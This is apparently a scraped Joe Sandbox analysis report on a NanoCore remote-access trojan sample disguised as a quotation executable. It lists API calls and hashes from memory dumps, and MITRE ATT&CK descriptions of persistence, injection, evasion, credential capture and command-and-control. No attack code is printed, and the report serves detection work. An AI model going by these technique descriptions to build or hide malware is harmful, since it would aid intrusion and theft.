Function 011B93E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 011B962E

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 02a0d60d6598be99a22c9b3aa36d91a3a7dc76ca52841776a93cdad1400f2369
Instruction ID: 9c42a9af4a61cee459b2fa574efb709dd571953592b741fbc31b3ae6867b4a24
Opcode Fuzzy Hash: 02a0d60d6598be99a22c9b3aa36d91a3a7dc76ca52841776a93cdad1400f2369
Instruction Fuzzy Hash: 267138B0A10B098FD768DF2AC58579ABBF5BF88208F00892DD586D7B40D774E816CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011BFB98, Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011BFD0A

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b33abbb3548f17bd2d2ddb0fb990ff9c9c55e767531219d4fb93e383978d55b4
Instruction ID: e156f3f34ed8e423c3ccfe364aa1357615ed4aadc036c8b5d7be5c3745caf485
Opcode Fuzzy Hash: b33abbb3548f17bd2d2ddb0fb990ff9c9c55e767531219d4fb93e383978d55b4
Instruction Fuzzy Hash: C45121B5C04249EFDF06CFA9C880ADDBFB1BF49304F24815AE818AB221D375A995CF50

Uniqueness

Uniqueness Score: -1.00%

Function 011BFB61, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011BFD0A

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 46a4c0b52d5eb854a82b8922048a26e246b4836d2a776a5ff2ca49cd73d7cc32
Instruction ID: d1551522f5407a34f67c95988f708ea19ad1ec9deae49ae1147207317df24a26
Opcode Fuzzy Hash: 46a4c0b52d5eb854a82b8922048a26e246b4836d2a776a5ff2ca49cd73d7cc32
Instruction Fuzzy Hash: 5351F2B1D043499FDF15CFA9C884ADDBFB1BF48314F24812AE814AB210D774A986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 011BDA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 011BFD0A

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c885a9d0bc3dbf9b1086b70a3f244cd45e36d25b2dd2b5e78a94c402ac613404
Instruction ID: abf4f8b3edeff70815f4d23cdfabf21c83f5b05a30cada3d0baa6b761d72a237
Opcode Fuzzy Hash: c885a9d0bc3dbf9b1086b70a3f244cd45e36d25b2dd2b5e78a94c402ac613404
Instruction Fuzzy Hash: 8D51A2B5D003099FDB19CF99C884ADEFBB5BF48314F24812AE819AB210D7759945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 011BA14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011BBCC6,?,?,?,?,?), ref: 011BBD87

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 02d1ba85e5dde00672e338d061311c428a581d52bbe594236eb67252f0e85eb8
Instruction ID: fc61ff2141580459f9605e4891c9af38259797304a0df0f13df91bd0083955cf
Opcode Fuzzy Hash: 02d1ba85e5dde00672e338d061311c428a581d52bbe594236eb67252f0e85eb8
Instruction Fuzzy Hash: DB21E4B5904248EFDB14CF9AD884AEEFBF5EB48314F14841AE958A3310D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 011BBCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011BBCC6,?,?,?,?,?), ref: 011BBD87

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: aff2f3dc3725d9a319c50f51be2bc77a361658c8dedd4d6540d1ffc0e8cc6a17
Instruction ID: 893d0184639dbcf1741e42130736f6dc9b0b58b52eeea274df02d1462947a925
Opcode Fuzzy Hash: aff2f3dc3725d9a319c50f51be2bc77a361658c8dedd4d6540d1ffc0e8cc6a17
Instruction Fuzzy Hash: 6321E4B59042489FDB10CFAAD884AEEFFF4EF48314F14841AE958A3310D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 011B8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011B96A9,00000800,00000000,00000000), ref: 011B98BA

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d710d37360ec797a677d977bbe340ee07348443733788d320c63b46b1811a886
Instruction ID: 1e7eec7bfb71a9288184dd9403e291baf8e2db7a2606bb526bfdfe37a5c86e0d
Opcode Fuzzy Hash: d710d37360ec797a677d977bbe340ee07348443733788d320c63b46b1811a886
Instruction Fuzzy Hash: B31103B69042098FDB14CF9AC484BEEFBF4EB89314F10842ED919A7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 011B9849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011B96A9,00000800,00000000,00000000), ref: 011B98BA

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ae32a05cc339ba0cf62b7282378270e0530e1fdaa3ef7a0e4d87ff7d3f504357
Instruction ID: 5444f7ee4faece2d4e0b635584f2ddadcfec26f8085d281034e2faa78980a579
Opcode Fuzzy Hash: ae32a05cc339ba0cf62b7282378270e0530e1fdaa3ef7a0e4d87ff7d3f504357
Instruction Fuzzy Hash: E21114B6D002498FDB14CFAAD484ADEFBF4AB89314F14842ED915A7600C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 011B95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 011B962E

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 71e2a00e00f510be64609642a2109c9aab780a3df0b31510b6e403c7c92ca5e1
Instruction ID: 6c3f5916ef8ef172f3c29fa8e5418443bba763aad2ec591b79e51b95de1359cd
Opcode Fuzzy Hash: 71e2a00e00f510be64609642a2109c9aab780a3df0b31510b6e403c7c92ca5e1
Instruction Fuzzy Hash: AA11E0B5D006498FDB14CF9AC484BDEFBF4AB89318F10C51AD929A7600D375A546CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 011BDA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,011BFE28,?,?,?,?), ref: 011BFE9D

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b4b6fd5eb423562fba2580442b89134975d7a16021c0d35ac2c48feba29dcd7a
Instruction ID: 01684b6a607a9d040f298ba339b1d5802feeb054a5a9cd0574471d665684b12d
Opcode Fuzzy Hash: b4b6fd5eb423562fba2580442b89134975d7a16021c0d35ac2c48feba29dcd7a
Instruction Fuzzy Hash: BC1106B59002499FDB10DF99D484BEEFBF4EB48314F11841AE955A7301C374A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 011BFE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,011BFE28,?,?,?,?), ref: 011BFE9D

Memory Dump Source

Source File: 0000000F.00000002.303913506.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ca87974c43e69276952c88f6d3ef55aea7ce1978a47023b8e153ab13f7e63692
Instruction ID: 84e5f4ecff19c7715b0d966113e515a1f629770a6f57b83b156dae3b4696d44a
Opcode Fuzzy Hash: ca87974c43e69276952c88f6d3ef55aea7ce1978a47023b8e153ab13f7e63692
Instruction Fuzzy Hash: 081106B58002499FDB10CF99D589BEEFBF4EB48314F10841AD954A7641C374A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Quotation ATB-PR28500KINH.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

Function 00586FB9, Relevance: .6, Instructions: 638
COMMONCrypto

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre